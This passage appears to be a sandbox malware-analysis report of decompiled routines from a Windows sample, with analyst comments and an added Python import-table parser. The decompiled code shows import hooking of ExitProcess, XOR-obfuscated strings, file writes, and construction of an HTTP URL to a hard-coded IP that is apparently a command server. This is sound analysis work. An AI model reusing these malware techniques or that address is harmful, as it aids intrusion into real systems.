									// high bit clear: import by name, +2 skips the Hint of IMAGE_IMPORT_BY_NAME
									_t51 = _t50 + _a4 + 2;
								} else {
									// high bit set (IMAGE_ORDINAL_FLAG32): ordinal in the low 16 bits
									_t51 = _t50 & 0x0000ffff;
								}
								 *_t68 = GetProcAddress(_t59, _t51);
								// Look up kernel32!ExitProcess for comparison (operands: _v8 = LoadLibraryA,
								// _v20 = "kernel32", "ExitProcess"; ordering as rendered by the decompiler)
								_t45 = GetProcAddress(_v8("ExitProcess"),  &_v20);
								if( *_t68 == _t45) {
									// An imported ExitProcess is replaced by the pointer held at 0x12dc0c0
									_t45 =  *0x12dc0c0;
									 *_t68 = _t45;
								}
								_t68 =  &(_t68[2]); // +4: next 32-bit thunk
							}
    							goto L14;
    						}
    						return _t45;
    					}
    				}
    				return _t45;
			}

    • Statement addresses (the IDA plugin's per-statement address column for the listing above, in listing order, 0x00000000 where a statement has none): 0x012d1bc6 to 0x012d1ccd
    APIs
    • GetProcAddress.KERNEL32(00000000,32336C65,?,LoadLibraryA), ref: 012D1C79
    • GetProcAddress.KERNEL32(00000000,?), ref: 012D1C9D
    • GetProcAddress.KERNEL32(00000000), ref: 012D1CAE
    Strings
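The routine E012D1BBE above is the sample's own import fix-up: it resolves LoadLibraryA from kernel32 using strings it builds on the stack, walks the IMAGE_IMPORT_DESCRIPTOR table (stride 0x14, FirstThunk at +0x10, Name at +0x0c), resolves each thunk by ordinal (high bit set) or by name (RVA + 2 to skip the Hint), and swaps any slot that resolved to kernel32!ExitProcess for the pointer kept at 0x12dc0c0. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox. It applies the same descriptor and thunk rules to a constructed flat image (RVA equals buffer offset, i.e. image base 0) and performs the same ExitProcess substitution with a made-up resolver; the image layout, the resolver addresses and the hook address are all constructed, and the parser can be pointed at a real dump's import directory to list what the stub would have resolved.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000   # high bit of a 32-bit thunk: import by ordinal
IMPORT_DESCRIPTOR_SIZE = 0x14       # sizeof(IMAGE_IMPORT_DESCRIPTOR); the stub steps _a8 by 0x14


def read_cstr(image: bytes, offset: int) -> str:
    """NUL-terminated ASCII string starting at offset."""
    return image[offset:image.index(b"\x00", offset)].decode("ascii")


def parse_imports(image: bytes, import_dir_rva: int):
    """Walk the import directory the way the stub does.

    The image is a flat buffer, so RVA == offset (the stub adds the image base
    _a4 to every RVA; here that base is 0).  Descriptors are 0x14 bytes; the
    walk ends at the first one whose FirstThunk (+0x10) is zero.  +0x0c holds
    the RVA of the DLL name.  A 32-bit thunk with the high bit set is an
    ordinal (low 16 bits); otherwise it is the RVA of an IMAGE_IMPORT_BY_NAME
    whose Name follows a 2-byte Hint, which is why the stub adds 2.
    """
    imports = []
    desc = import_dir_rva
    while True:
        _oft, _stamp, _fwd, name_rva, first_thunk = struct.unpack_from("<5I", image, desc)
        if first_thunk == 0:
            break
        dll = read_cstr(image, name_rva)
        thunk = first_thunk
        while True:
            (entry,) = struct.unpack_from("<I", image, thunk)
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                imports.append((dll, entry & 0xFFFF))
            else:
                imports.append((dll, read_cstr(image, entry + 2)))
            thunk += 4
        desc += IMPORT_DESCRIPTOR_SIZE
    return imports


def fix_up_iat(imports, resolve, exit_process_addr, hook_addr):
    """Mimic the fix-up loop: each slot receives the resolved address, except a
    slot that resolved to kernel32!ExitProcess, which receives hook_addr
    instead (the stub reads that replacement from the global at 0x12dc0c0)."""
    patched = []
    for dll, sym in imports:
        addr = resolve(dll, sym)
        patched.append(hook_addr if addr == exit_process_addr else addr)
    return patched


def build_sample_image():
    """Constructed test image (not taken from the sample): one descriptor for
    KERNEL32.dll importing ExitProcess by name and ordinal 0x10 by ordinal,
    followed by the all-zero terminating descriptor."""
    buf = bytearray(0x200)
    desc_off, dll_off, ibn_off, thunk_off = 0x40, 0x100, 0x120, 0x140
    buf[dll_off:dll_off + 13] = b"KERNEL32.dll\x00"
    struct.pack_into("<H", buf, ibn_off, 0)                 # IMAGE_IMPORT_BY_NAME.Hint
    buf[ibn_off + 2:ibn_off + 14] = b"ExitProcess\x00"      # IMAGE_IMPORT_BY_NAME.Name
    struct.pack_into("<III", buf, thunk_off, ibn_off, IMAGE_ORDINAL_FLAG32 | 0x10, 0)
    struct.pack_into("<5I", buf, desc_off, thunk_off, 0, 0, dll_off, thunk_off)
    return bytes(buf), desc_off


# Constructed stand-in for GetProcAddress; the addresses are made up.
FAKE_EXPORTS = {("KERNEL32.dll", "ExitProcess"): 0x77E01234,
                ("KERNEL32.dll", 0x10): 0x77E05678}
FAKE_HOOK = 0x00401000  # stands in for the pointer stored at 0x12dc0c0


def demo():
    image, import_dir = build_sample_image()
    imports = parse_imports(image, import_dir)
    patched = fix_up_iat(imports, lambda dll, sym: FAKE_EXPORTS[(dll, sym)],
                         FAKE_EXPORTS[("KERNEL32.dll", "ExitProcess")], FAKE_HOOK)
    return imports, patched


if __name__ == "__main__":
    imports, patched = demo()
    for (dll, sym), addr in zip(imports, patched):
        print(f"{dll}!{sym!s:<12} -> {addr:#010x}")
```

When run against a real memory dump, feed parse_imports the dumped image with the import directory RVA taken from the optional header (the value the stub reads at NT headers + 0x80) and compare the by-name list with the APIs the sandbox recorded; an ExitProcess slot that points back into the image rather than into kernel32 is the signature of the substitution shown above.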
    C-Code - Quality: 42%
    			E012D0EDD(intOrPtr __eax, int __ebx, void* __edx, void* __edi, intOrPtr* __esi) {
    				signed char _t47;
    				void* _t49;
    				void* _t51;
    				int _t52;
    				void* _t63;
    				int _t70;
    				void* _t75;
    				int _t80;
    				void* _t84;
    				void* _t87;
    				void* _t89;
    				void* _t90;
    				intOrPtr* _t92;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    
    				_t92 = __esi;
    				_t90 = __edi;
    				_t89 = __edx;
    				_t80 = __ebx;
				 *((intOrPtr*)(_t96 - 0x10)) = __eax;
				// Round (0x60000a - value) up to the next multiple of 8, one increment at a time;
				// as rendered, the slot at ebp+8 keeps 0x60000a when no rounding was needed
				_t47 = 0x60000a -  *((intOrPtr*)(_t96 - 0x10));
				 *(_t96 + 8) = 0x60000a;
				if((_t47 & 0x00000007) != 0) {
					do {
						_t47 = _t47 + 1;
					} while ((_t47 & 0x00000007) != 0);
					 *(_t96 + 8) = _t47;
				}
    				_t106 = _t47 - _t80;
    				if(_t47 <= _t80) {
    					CloseHandle( *(_t96 - 8));
    				} else {
    					_t51 = E012D02B6(0x12e4f18, _t106);
    					_push( *(_t96 + 8));
    					if(_t51 != 0) {
    						_t52 = E012CDD70(_t89, _t90, _t96);
    						_push(_t96 - 0x10);
    						_push( *(_t96 + 8));
    						 *(_t96 - 0xc) = _t52;
    						_push(_t52);
    						 *(_t96 + 8) = E012CDC6C(_t80, _t90, _t92,  *(_t96 - 8));
    						E012CC788(_t96 - 0x10, _t89, _t92,  *(_t96 - 0xc));
    						__eflags =  *(_t96 + 8) - _t80;
    						if( *(_t96 + 8) != _t80) {
    							CloseHandle( *(_t96 - 8));
    							 *((short*)(_t96 - 0x2cc)) = 0;
    							E012C8BA0(_t96 - 0x2ca, _t80, 0x206);
    							_push(_t96 - 0x2cc);
    							E012CF4BA(_t80, _t90, _t92);
    							_pop(_t84);
							// 7-argument indirect call through _t92 on the path built at ebp-0x2cc; the
							// constants (0xc0000000 = GENERIC_READ|GENERIC_WRITE, share 3 = READ|WRITE,
							// disposition 4 = OPEN_ALWAYS) are consistent with CreateFileW, and the result
							// is checked against INVALID_HANDLE_VALUE (-1) below
							_t94 =  *_t92(_t96 - 0x2cc, 0xc0000000, 3, _t80, 4, _t90, _t80);
    							__eflags = _t94 - 0xffffffff;
    							if(__eflags != 0) {
    								_push(_t80);
    								_t63 = _t96 - 0xc;
    								_push(_t63);
    								_push( *((intOrPtr*)(_t96 - 0x10)));
    								 *(_t96 - 0xc) = _t80;
    								_push( *(_t96 + 8));
    								_push(_t94);
    								_push(_t63);
    								E01305FEF(_t63, _t80, __eflags);
    								CloseHandle(_t94);
    								_push(_t96 + 8);
    								_push( *((intOrPtr*)(_t96 - 0x14)));
    								_push(_t96 - 0x2cc);
    								E012D21C1(_t80, _t84, _t89, _t90, _t94, __eflags);
    								E012D1F7B(_t80, _t89, _t90, _t94, __eflags,  *(_t96 + 8));
								ExitProcess(_t80); // exits after the file write and the SendMessageW in subcall 012D1F7B (see API refs)
    							}
    						}
    					} else {
    						 *(_t96 - 0xa4) = _t80;
    						_t70 = E012CDD70(_t89, _t90, _t96);
    						_t87 = _t96 - 0x10;
    						 *(_t96 - 0xc) = _t70;
    						 *(_t96 + 8) = E012CDC6C(_t80, _t90, _t92,  *(_t96 - 8));
    						CloseHandle( *(_t96 - 8));
						// Same indirect call (extra operands are decompiler residue): access 2 (FILE_WRITE_DATA),
						// share 3, disposition 3 (OPEN_EXISTING) if _t92 is CreateFileW as above
						_t95 =  *_t92( *((intOrPtr*)(_t96 - 0x14)), 2, 3, _t80, 3, _t90, _t80, _t70,  *(_t96 + 8), _t87);
    						if( *(_t96 + 8) != _t80) {
    							_push(_t80);
    							_push(_t80);
    							_push(_t80);
    							_push(_t95);
    							_push(_t90);
    							_t75 = E01343C0F(_t73);
    							_t109 = _t75 - 0xffffffff;
    							if(_t75 != 0xffffffff) {
    								_push(_t80);
    								_push(_t96 - 0xa4);
    								_push( *((intOrPtr*)(_t96 - 0x10)));
    								_push( *(_t96 + 8));
    								_push(_t95);
    								_push(_t87);
    								E01354037(_t96 - 0xa4, _t87, _t95, _t109);
    								CloseHandle(_t95);
    							}
    							E012CC788(_t87, _t89, _t95,  *(_t96 + 8));
    							_pop(_t87);
    						}
    						E012CC788(_t87, _t89, _t95,  *(_t96 - 0xc));
    					}
    				}
    				_t49 = 0x2b;
    				return _t49;
			}

    • Statement addresses (the IDA plugin's per-statement address column for the listing above, in listing order, 0x00000000 where a statement has none): 0x012d0edd to 0x012d106b

    APIs
    • CloseHandle.KERNEL32(?), ref: 012D0F3C
    • CloseHandle.KERNEL32(00000000), ref: 012D0F7C
    • CloseHandle.KERNEL32(?), ref: 012D0FCC
    • CloseHandle.KERNEL32(00000000), ref: 012D102F
      • Part of subcall function 012D1F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 012D212D
    • ExitProcess.KERNEL32 ref: 012D1055
    • CloseHandle.KERNEL32(?), ref: 012D105E
    C-Code - Quality: 92%
    			E012C28CC(void* __ecx, void* __esi) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1288;
    				char _v1301;
    				signed char _v1302;
    				char _v1308;
    				char _v1312;
    				void* __ebx;
    				void* __edi;
    				void* __ebp;
    				signed int _t66;
    				char* _t71;
    				char _t73;
    				signed char _t74;
    				signed int _t84;
    				void* _t89;
    				signed char* _t91;
    				signed int _t93;
    				signed char _t96;
    				char _t97;
    				signed int _t98;
    				void* _t102;
    				signed int _t103;
    				void* _t104;
    
				// Locale ctype table setup matching the CRT's __init_ctype: identity byte table,
				// LCMapString lower (0x100) and upper (0x200) maps via E012C8E21, then 0x10/0x20
				// class bits for C1_UPPER (1) / C1_LOWER (2) at +0x1d and the case map at +0x11d.
				// CRT support code, not sample-specific logic.
				_t102 = __esi;
				_t66 =  *0x12e2aa8; // 0x5ff9d198 stack cookie (/GS); E012C8B82 checks _v8 ^ ebp on return
    				_v8 = _t66 ^ _t103;
    				_push( &_v1308);
    				_push( *((intOrPtr*)(__esi + 4)));
    				_push(__ecx);
    				if(E012EB5AB( &_v1308) == 0) {
    					_v1312 = 0xffffff9f;
    					_t93 = 0;
    					_t49 =  &_v1312;
    					 *_t49 = _v1312 - __esi + 0x11d;
    					__eflags =  *_t49;
    					do {
    						_t71 = _t102 + _t93 + 0x11d;
    						_t99 = _v1312 + _t71;
    						_t54 = _t99 + 0x20; // 0xffffffbf
    						_t90 = _t54;
    						__eflags = _t54 - 0x19;
    						if(_t54 > 0x19) {
    							__eflags = _t99 - 0x19;
    							if(_t99 > 0x19) {
    								 *_t71 = 0;
    							} else {
    								_t60 = _t102 + _t93 + 0x1d;
    								 *_t60 =  *(_t102 + _t93 + 0x1d) | 0x00000020;
    								__eflags =  *_t60;
    								_t64 = _t93 - 0x20; // -32
    								_t99 = _t64;
    								goto L22;
    							}
    						} else {
    							 *(_t102 + _t93 + 0x1d) =  *(_t102 + _t93 + 0x1d) | 0x00000010;
    							_t59 = _t93 + 0x20; // 0x20
    							_t99 = _t59;
    							L22:
    							 *_t71 = _t99;
    						}
    						_t93 = _t93 + 1;
    						__eflags = _t93 - 0x100;
    					} while (_t93 < 0x100);
    				} else {
    					_t73 = 0;
    					do {
    						 *((char*)(_t103 + _t73 - 0x104)) = _t73;
    						_t73 = _t73 + 1;
    					} while (_t73 < 0x100);
    					_t74 = _v1302;
    					_v264 = 0x20;
    					if(_t74 != 0) {
    						_t91 =  &_v1301;
    						do {
    							_t98 = _t74 & 0x000000ff;
    							_t85 =  *_t91 & 0x000000ff;
    							if(_t98 <= ( *_t91 & 0x000000ff)) {
    								_t99 = _t103 + _t98 - 0x104;
    								E012C8BA0(_t103 + _t98 - 0x104, 0x20, _t85 - _t98 + 1);
    								_t104 = _t104 + 0xc;
    							}
    							_t74 = _t91[1];
    							_t91 =  &(_t91[2]);
    							_t113 = _t74;
    						} while (_t74 != 0);
    					}
    					E012C8F4E(_t89, _t99, _t113, 0, 1,  &_v264, 0x100,  &_v1288,  *((intOrPtr*)(_t102 + 4)),  *((intOrPtr*)(_t102 + 0xc)), 0);
    					_t90 = 0;
    					E012C8E21(0, _t113, 0,  *((intOrPtr*)(_t102 + 0xc)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *((intOrPtr*)(_t102 + 4)), 0);
    					E012C8E21(0, _t113, 0,  *((intOrPtr*)(_t102 + 0xc)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *((intOrPtr*)(_t102 + 4)), 0);
    					_t84 = 0;
    					do {
    						_t96 =  *(_t103 + _t84 * 2 - 0x504) & 0x0000ffff;
    						if((_t96 & 0x00000001) == 0) {
    							__eflags = _t96 & 0x00000002;
    							if((_t96 & 0x00000002) == 0) {
    								 *((char*)(_t102 + _t84 + 0x11d)) = _t90;
    							} else {
    								_t37 = _t102 + _t84 + 0x1d;
    								 *_t37 =  *(_t102 + _t84 + 0x1d) | 0x00000020;
    								__eflags =  *_t37;
    								_t97 =  *((intOrPtr*)(_t103 + _t84 - 0x304));
    								goto L13;
    							}
    						} else {
    							 *(_t102 + _t84 + 0x1d) =  *(_t102 + _t84 + 0x1d) | 0x00000010;
    							_t97 =  *((intOrPtr*)(_t103 + _t84 - 0x204));
    							L13:
    							 *((char*)(_t102 + _t84 + 0x11d)) = _t97;
    						}
    						_t84 = _t84 + 1;
    					} while (_t84 < 0x100);
    				}
    				return E012C8B82(_t71, _t90, _v8 ^ _t103, _t99, 0x100, _t102);
			}

    • Statement addresses (the IDA plugin's per-statement address column for the listing above, in listing order, 0x00000000 where a statement has none): 0x012c28cc to 0x012c2a5b

    APIs
    Strings
    C-Code - Quality: 73%
    			E012D2F9F(signed int __eax, void* __ebx, void* __edx, void* __esi, void* __ebp, int _a4, char _a10, struct HINSTANCE__* _a12, int _a16, signed int _a24, signed int _a28, signed int _a32, int _a36, signed int _a40, void* _a44, char _a48, signed int _a52, void* _a56, short _a60, short _a62, signed int _a64, int _a68, char _a100, intOrPtr _a108, intOrPtr _a112, signed int _a116, void* _a120, signed int _a128) {
    				char _v0;
    				intOrPtr _v12;
    				int _v16;
    				void* __edi;
    				signed int _t52;
    
    				_a40 = __eax;
    				_t52 = E012D28CC(__ebx, __esi);
    				_a64 = _t52;
    				if(_t52 == 0) {
    					_push(_a16);
    					return E0135D6CD(_t52);
    				}
    				_push(0);
    				_push(__ebp);
    				__eax = E012F3F0D(__eax, __esi);
    				_a4 = __eax;
    				_a108 = 0x3c;
    				_push(__edi);
    				__eax = E012E968F(__eax);
    				__esi = __eax;
    				_push(__ebx);
    				__eflags = __eax - 4;
    				if(__eflags != 0) {
    					L5:
    					__eax =  &_a100;
    					_push(__eax);
    					_push(__esi);
    					_push(__edx);
    					__eax = E012EB0D2(__eax, __ebx, __edx, __eflags);
    					__eflags = __eax;
    					if(__eax != 0) {
    						__ecx = 0;
    						__eax = 0;
    						__edx = __ebx;
    						_a108 = 0;
    						_a112 = 0;
    						_a116 = __edx;
    						_a120 = __edi;
    						__eax =  ~0x00000000;
    						__eflags = _a128 & 0x00400000;
    						_a40 =  ~0x00000000;
    						if(__eflags == 0) {
    							__ecx =  ~0x00000000;
    							_t31 =  &_a32;
    							 *_t31 = _a32 & 0x00000000;
    							__eflags =  *_t31;
    							_a28 =  ~0x00000000;
    							_a24 = __ebx;
    						} else {
    							__eax = __ebx - 1;
    							_a32 = __ebx - 1;
    							__edx = __edx - __ebx;
    							__ebx =  ~__ebx;
    							_a28 = __edx;
    							_a24 =  ~__ebx;
    						}
    						__esi = __edi * __ebx << 2;
    						__eax = E012CC795(__edx, __edi * __ebx << 2, __eflags);
    						__ecx = 0;
    						_a16 = __eax;
    						__eflags = __eax;
    						if(__eax != 0) {
    							__eax = 0;
    							__ecx = 0xa;
    							__edi =  &_a48;
    							__eax = memset(__edi, 0, 0 << 2);
    							__edi = __edi + __ecx;
    							__ecx = 0;
    							__edi = _a44;
    							_a64 = _a64 & 0x00000000;
    							__eax = __eax + 1;
    							_a60 = __ax;
    							__eax = 0x10;
    							_a62 = __ax;
    							__edi = __edi * __ebx;
    							__eax = __edi * __ebx + __edi * __ebx;
    							__eflags = __eax;
    							_push(0);
    							_a48 = 0x28;
    							_a52 = __ebx;
    							_a56 = __edi;
    							_a68 = __eax;
    							return __eax;
    						}
    						__eflags = _a36;
    						if(_a36 == 0) {
    							__eflags = _v16;
    							if(__eflags != 0) {
    								_push(_v16);
    								_push(_v12);
    								goto L16;
    							}
    						} else {
    							__eflags = _v16;
    							if(_v16 != 0) {
    								_push(_v16);
    								_push(0);
    								L16:
    								_push(__eax);
    								__eax = E0137A3C2(__ebx);
    							}
    						}
    					} else {
    						__eflags = _a10 - __al;
    						if(_a10 == __al) {
    							do {
    								 *(__esp + __eax + 0x1c) =  *(__esp + __eax + 0x1c) ^ 0x00000007;
    								__eax = __eax + 1;
    								__eflags = __eax - 0xa;
    							} while (__eax < 0xa);
    							_a10 = 1;
    						}
    						__eax =  &_v0;
    						__eax = GetProcAddress(_a12,  &_v0);
    						__eflags = _v16;
    						if(_v16 != 0) {
    							__eax =  *__eax(0, _v16);
    						}
    					}
    				} else {
    					__eflags = E012CF5EF(__ebx, __edi, __esi) - 0xc;
    					if(__eflags > 0) {
    						__eax = CloseHandle(4);
    						goto L5;
    					}
    				}
    				return 0;
    			}

    APIs
    • CloseHandle.KERNEL32(00000004), ref: 012D2FEB
    • GetProcAddress.KERNEL32(?,?,?,00000000,0000003C), ref: 012D3020
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 57%
    			E012D1520(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
    				long _v12;
    				char _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				short _v22;
    				short _v24;
    				short _v26;
    				char _v28;
    				signed int _t48;
    				signed int _t56;
    				void* _t58;
    				void* _t60;
    				int _t62;
    				void* _t63;
    				intOrPtr _t66;
    				void* _t67;
    				intOrPtr _t69;
    				signed int _t81;
    				signed int _t90;
    				void* _t96;
    				void* _t97;
    
    				_t91 = __esi;
    				_t84 = __edx;
    				_t71 = __ebx;
    				_t96 = _t97;
    				_t41 = _a8;
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				if(_t41 != 1) {
    					__eflags = _t41 - 0xf;
    					if(_t41 == 0xf) {
    						L39:
    						_push(_a16);
    						_push(_a12);
    						_push(_a8);
    						_push(_a4);
    						return E012F6584(_t41);
    					}
    					__eflags = _t41 - 5;
    					if(_t41 == 5) {
    						goto L39;
    					}
    					__eflags = _t41 - 2;
    					if(_t41 == 2) {
    						goto L39;
    					}
    					__eflags = _t41 - 0x10;
    					if(_t41 == 0x10) {
    						_push(0);
    						_push(1);
    						_t41 = E01329419(_t41, 1);
    						goto L39;
    					}
    					__eflags = _t41 - 0x12;
    					if(_t41 == 0x12) {
    						_t66 =  *0x12e59a8; // 0x3cb070
    						_t67 =  *(_t66 + 8);
    						__eflags = _t67 - 0xffffffff;
    						if(__eflags != 0) {
    							CloseHandle(_t67);
    							_t69 =  *0x12e59a8; // 0x3cb070
    							 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
    						}
    						L11:
    						_push(0);
    						_t41 = E012D089D(_t71, 1, _t91, __eflags);
    						goto L39;
    					}
    					__eflags = _t41 - 0x16;
    					if(__eflags == 0) {
    						goto L11;
    					}
    					__eflags = _t41 - 0x400;
    					if(_t41 == 0x400) {
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(E012D87B6);
    						_push(0);
    						_push(0);
    						_push(__ecx);
    						 *0x12e2f08 = _t41;
    						goto L39;
    					}
    					__eflags = _t41 - 0x463;
    					if(_t41 != 0x463) {
    						__eflags = _t41 - 0x401;
    						if(_t41 != 0x401) {
    							__eflags = _t41 - 0x402;
    							if(__eflags == 0) {
    								_push(__edx);
    								_t41 = E013322C5(_t41, __edx, 1, __eflags);
    								__eflags = _t41 - 4;
    								if(_t41 != 4) {
    									goto L39;
    								}
    								_v16 = 0x16a;
    								_v18 = 0x14b;
    								_v20 = 0x11e;
    								_v22 = 0x118;
    								_v24 = 0x10f;
    								_v26 = 0x106;
    								_v28 = 0x12b;
    								_v14 = 0;
    								_t56 = 0;
    								__eflags = 0;
    								do {
    									 *(_t96 + _t56 * 2 - 0x18) =  *(_t96 + _t56 * 2 - 0x18) ^ 0x0000016a;
    									_t56 = _t56 + 1;
    									__eflags = _t56 - 7;
    								} while (_t56 < 7);
    								_push(0);
    								_push( &_v28);
    								_push(0x12e06d0);
    								_push(0);
    								_v14 = 1;
    								_push(0);
    								_t41 = E01308713( &_v28, 0);
    								goto L39;
    							}
    							__eflags = _t41 - 0x403;
    							if(_t41 == 0x403) {
    								_t48 = _a16;
    								asm("cdq");
    								_t81 = 0x32;
    								_t41 = _t48 / _t81;
    								_v12 = _t48 % _t81;
    								_t90 = _t48 / _t81;
    								while(1) {
    									__eflags = _t90;
    									if(_t90 == 0) {
    										break;
    									}
    									_t90 = _t90 - 1;
    									__eflags = _t90;
    									Sleep(0x32);
    								}
    								Sleep(_v12);
    								goto L39;
    							}
    							__eflags = _t41 - 0x404;
    							if(_t41 == 0x404) {
    								goto L39;
    							}
    							__eflags = _t41 - 0x464;
    							if(_t41 == 0x464) {
    								_push( &_v12);
    								_push(0);
    								_push(0);
    								_push(E012D0BAF);
    								_push(0);
    								_push(0);
    								_push(_t96);
    								_t41 = E0130E834( &_v12, 0, __ecx);
    								goto L39;
    							}
    							__eflags = _t41 - 0x405;
    							if(_t41 != 0x405) {
    								__eflags = _t41 - 0x4a;
    								if(_t41 != 0x4a) {
    									goto L39;
    								}
    								__eflags =  *_a16 - 1;
    								if( *_a16 != 1) {
    									goto L39;
    								}
    								_push( &_v28);
    								return E012E71C0( &_v28, __edx, 1);
    							}
    							_push( &_v12);
    							__eflags = 0;
    							_push(0);
    							_push(0);
    							_push(E012D089D);
    							_push(0);
    							_push(0);
    							return E013499C7( &_v12);
    						} else {
    							_push(0x10);
    							__eflags = 0;
    							_push(0);
    							_push(__ecx);
    							_t58 = E0130D45A(_t41);
    							_push(0x12e59b4);
    							_push(0);
    							_push(_t58);
    							_push(E012D125F);
    							_push(0);
    							_push(0);
    							return E0130A17E(_t58);
    						}
    					} else {
    						_t60 =  *0x12e2f0c; // 0xb8
    						_v12 = 0;
    						__eflags = _t60 - 0xffffffff;
    						if(__eflags == 0) {
    							CloseHandle( *0x12e2f0c);
    							_t62 = CloseHandle( *0x12e2f10);
    							_push(0);
    							_push(0);
    							_push(1);
    							_push(0);
    							_push(0);
    							_t63 = E0130C977(_t62, 0, __eflags);
    							_push( &_v12);
    							_push(0);
    							_push(_t63);
    							_push(E012CFF4D);
    							_push(0);
    							_push(0);
    							 *0x12e2f0c = _t63;
    							return E0130D5F1(_t63, _t84, 1);
    						} else {
    							_push(_t60);
    							return E01357129(_t60, __ecx, __edx);
    						}
    					}
    				} else {
    					return E013138ED(_t41, __ebx, 1);
    				}
    				goto L41;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 87%
    			E012CC931(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				intOrPtr _v12;
    				char _v16;
    				short _v20;
    				short _v22;
    				short _v24;
    				short _v26;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				short _v54;
    				short _v56;
    				short _v58;
    				short _v60;
    				short _v62;
    				short _v64;
    				short _v66;
    				short _v68;
    				short _v70;
    				char _v72;
    				char _v82;
    				short _v84;
    				short _v86;
    				short _v88;
    				short _v90;
    				intOrPtr _v94;
    				short _v96;
    				short _v98;
    				short _v100;
    				short _v102;
    				short _v104;
    				intOrPtr _v108;
    				short _v110;
    				short _v112;
    				short _v114;
    				short _v116;
    				short _v118;
    				short _v120;
    				short _v122;
    				short _v124;
    				short _v126;
    				short _v128;
    				short _v130;
    				short _v132;
    				short _v134;
    				short _v136;
    				short _v138;
    				short _v140;
    				intOrPtr _v144;
    				short _v146;
    				short _v148;
    				short _v150;
    				short _v152;
    				short _v154;
    				short _v156;
    				short _v158;
    				short _v160;
    				short _v162;
    				short _v164;
    				short _v166;
    				short _v168;
    				short _v170;
    				short _v172;
    				short _v174;
    				short _v176;
    				short _v178;
    				short _v180;
    				short _v182;
    				short _v184;
    				short _v186;
    				short _v188;
    				short _v190;
    				short _v192;
    				short _v194;
    				short _v196;
    				short _v198;
    				short _v200;
    				short _v202;
    				short _v204;
    				short _v206;
    				short _v208;
    				short _v210;
    				short _v212;
    				short _v214;
    				intOrPtr _v218;
    				short _v220;
    				short _v222;
    				short _v224;
    				short _v226;
    				short _v228;
    				short _v230;
    				short _v232;
    				short _v234;
    				short _v236;
    				short _v238;
    				short _v240;
    				short _v242;
    				short _v244;
    				short _v246;
    				short _v248;
    				short _v250;
    				short _v252;
    				short _v254;
    				short _v256;
    				short _v258;
    				intOrPtr _v262;
    				intOrPtr _v266;
    				short _v268;
    				short _v270;
    				short _v272;
    				short _v274;
    				intOrPtr _v278;
    				intOrPtr _v282;
    				char _v284;
    				signed int _v288;
    				char _v292;
    				char _v304;
    				intOrPtr _v312;
    				char _v316;
    				char _v320;
    				char _v836;
    				char _v1348;
    				void* __edi;
    				void* __esi;
    				short _t202;
    				short _t203;
    				short _t204;
    				short _t205;
    				short _t206;
    				short _t207;
    				short _t208;
    				intOrPtr _t234;
    				intOrPtr _t235;
    				intOrPtr _t243;
    				intOrPtr _t244;
    				intOrPtr _t245;
    				intOrPtr _t246;
    				intOrPtr _t247;
    				intOrPtr _t249;
    				intOrPtr _t253;
    				intOrPtr _t255;
    				char _t256;
    				intOrPtr _t258;
    				char* _t261;
    				intOrPtr _t270;
    				intOrPtr _t275;
    				intOrPtr _t277;
    				short _t323;
    				short _t324;
    				short _t325;
    				short _t326;
    				void* _t335;
    				void* _t336;
    				intOrPtr _t387;
    
    				_t336 = __edx;
    				_t202 = 0x68;
    				_v72 = _t202;
    				_t203 = 0x74;
    				_v288 = _v288 & 0x00000000;
    				_v70 = _t203;
    				_v68 = _t203;
    				_t204 = 0x70;
    				_v66 = _t204;
    				_t205 = 0x3a;
    				_v64 = _t205;
    				_t206 = 0x2f;
    				_v62 = _t206;
    				_v60 = _t206;
    				_t207 = 0x25;
    				_v58 = _t207;
    				_t208 = 0x53;
    				_v56 = _t208;
    				_v54 = 0;
    				_v292 = L"*/*";
    				E012C1000(0x200, L"%S", "192.243.101.124");
    				E012C1000(0x200,  &_v72, "192.243.101.124");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if( *0x12e5968 != 0) {
    					L4:
    					_v84 = 0x8c;
    					_v86 = 0xba;
    					_v96 = 0xb9;
    					_v98 = 0xa3;
    					_v100 = 0xe5;
    					_v88 = 0xbf;
    					_v102 = 0xfe;
    					_v90 = 0xbf;
    					_v104 = 0xed;
    					_v110 = 0xdf;
    					_v112 = 0xac;
    					_v114 = 0xbc;
    					_v116 = 0xbf;
    					_v118 = 0xb4;
